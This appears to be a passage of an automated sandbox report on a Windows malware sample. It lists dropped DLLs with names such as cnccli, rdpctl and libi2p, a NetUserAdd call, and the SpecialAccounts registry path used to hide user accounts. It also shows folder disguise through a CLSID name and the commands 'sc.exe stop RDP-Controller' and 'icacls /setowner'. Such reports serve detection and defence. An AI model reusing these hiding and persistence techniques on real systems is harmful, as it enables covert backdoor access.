Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeFile written: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exeStatic file information: File size 5654528 > 1048576
Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x43c600
Source: Binary string: RfxVmt.pdb source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, Cw0MZxef.23.dr, rfxvmt.dll.23.dr
Source: Binary string: RfxVmt.pdbGCTL source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, Cw0MZxef.23.dr, rfxvmt.dll.23.dr

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.2770000.1.unpack
Source: rfxvmt.dll.23.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B93FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,5_2_00007FF64B93FF1F
Source: file.exeStatic PE information: section name: .didata
Source: cwjk513wjc7a1mlgh3.exe.1.drStatic PE information: section name: .xdata
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe.1.drStatic PE information: section name: .xdata
Source: main.exe.12.drStatic PE information: section name: .xdata
Source: termsrv32.dll.23.drStatic PE information: section name: .xdata
Source: rdpctl.dll.23.drStatic PE information: section name: .xdata
Source: samctl.dll.23.drStatic PE information: section name: .xdata
Source: prgmgr.dll.23.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.23.drStatic PE information: section name: .xdata
Source: cnccli.dll.23.drStatic PE information: section name: .xdata
Source: libi2p.dll.23.drStatic PE information: section name: .xdata
Source: evtsrv.dll.23.drStatic PE information: section name: .xdata
Source: ROF9A37w.23.drStatic PE information: section name: .xdata
Source: w3LkirgH.23.drStatic PE information: section name: .xdata
Source: eKTTDy2k.23.drStatic PE information: section name: .xdata
Source: bMZx4vGr.23.drStatic PE information: section name: .xdata
Source: ogg99SMu.23.drStatic PE information: section name: .xdata
Source: t291wOio.23.drStatic PE information: section name: .xdata
Source: 6rRRlGVV.23.drStatic PE information: section name: .xdata
Source: TsG1eHIt.23.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0274F262 push es; retf 0_2_0274F263
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0273120E pushfd ; retf 0_2_0273120F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02736769 push esi; ret 0_2_0273676B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE7A07 push qword ptr [00007FFE47BE78D8h]; retf 23_2_00007FFE11BE7A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79FF push qword ptr [00007FFE47BE78D0h]; retf 23_2_00007FFE11BE7A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE7A17 push qword ptr [00007FFE18BE78E8h]; retf 23_2_00007FFE11BE7A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE7A0F push qword ptr [00007FFE47BE78E0h]; retf 23_2_00007FFE11BE7A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79CB push qword ptr [00007FFE47BE789Ch]; retf 23_2_00007FFE11BE79D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79C3 push qword ptr [00007FFE47BE7894h]; retf 23_2_00007FFE11BE79C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79D3 push qword ptr [00007FFE47BE78A4h]; retf 23_2_00007FFE11BE79D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79E7 push qword ptr [00007FFE47BE78B8h]; retf 23_2_00007FFE11BE79ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79F7 push qword ptr [00007FFE47BE78C8h]; retf 23_2_00007FFE11BE79FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79EF push qword ptr [00007FFE47BE78C0h]; retf 23_2_00007FFE11BE79F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79BB push qword ptr [00007FFE47BE788Ch]; retf 23_2_00007FFE11BE79C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE79B3 push qword ptr [00007FFE47BE7884h]; retf 23_2_00007FFE11BE79B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72CC push rsp; ret 23_2_00007FFE11BE72CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72C4 push rsp; ret 23_2_00007FFE11BE72C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72DC push rsp; ret 23_2_00007FFE11BE72DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72D8 push rsp; ret 23_2_00007FFE11BE72D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72D4 push rsp; ret 23_2_00007FFE11BE72D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72D0 push rsp; ret 23_2_00007FFE11BE72D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72E8 push rsp; ret 23_2_00007FFE11BE72E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72E4 push rsp; ret 23_2_00007FFE11BE72E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72E0 push rsp; ret 23_2_00007FFE11BE72E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72BC push rsp; ret 23_2_00007FFE11BE72BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE72B8 push rsp; ret 23_2_00007FFE11BE72B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE727C push rsp; ret 23_2_00007FFE11BE727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE726F push qword ptr [rsi]; ret 23_2_00007FFE11BE7275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11ED0052 push rsi; iretd 23_2_00007FFE11ED0053
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1150870B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,23_2_00007FFE1150870B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ROF9A37wJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TsG1eHItJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\bMZx4vGrJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ogg99SMuJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\t291wOioJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\Cw0MZxefJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\eKTTDy2kJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\w3LkirgHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6rRRlGVVJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ROF9A37wJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TsG1eHItJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\bMZx4vGrJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ogg99SMuJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\t291wOioJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\Cw0MZxefJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\eKTTDy2kJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\w3LkirgHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6rRRlGVVJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ROF9A37wJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\Cw0MZxefJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\w3LkirgHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\eKTTDy2kJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\bMZx4vGrJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ogg99SMuJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\t291wOioJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6rRRlGVVJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TsG1eHItJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF7C1AB1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,23_2_00007FF7C1AB1DBC
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

barindex
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.2955747278.00007FFE11784000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.2955747278.00007FFE11784000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
